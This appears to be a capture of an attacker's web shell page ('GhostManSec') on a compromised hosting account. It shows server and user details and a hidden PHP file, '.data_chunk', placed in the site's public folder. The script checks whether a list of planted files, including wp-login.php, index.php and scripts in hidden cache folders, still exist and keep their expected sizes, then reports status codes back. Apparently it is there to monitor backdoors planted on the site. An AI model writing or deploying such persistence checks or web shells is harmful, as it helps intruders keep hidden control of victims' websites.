GhostManSec
Server: LiteSpeed
System: Linux server251.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: moroqbvm (12347)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/moroqbvm/public_html/kro__b585595/.data_chunk
<?php   $r = '/home/moroqbvm/public_html'; $x = ["/kro__b585595/wp-login.php"=>"bd@@436508@@76",
"/assets__b585595/img/icons/list-grid/.cache_a/groups.php"=>"bd@@430315@@50",
"/assets__b585595/img/icons/list-grid/.cache_a/inc.php"=>"bd@@433033@@19",
"/assets__b585595/img/icons/list-grid/.cache_a/logout.php"=>"bd@@433001@@85",
"/index.php"=>"bd@@427150@@81",
"/assets__b585595/img/icons/list-grid/.cache_a/groups.php"=>"bd@@419112@@576",
"/assets__b585595/img/icons/list-grid/.cache_a/inc.php"=>"bd@@417409@@6335"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');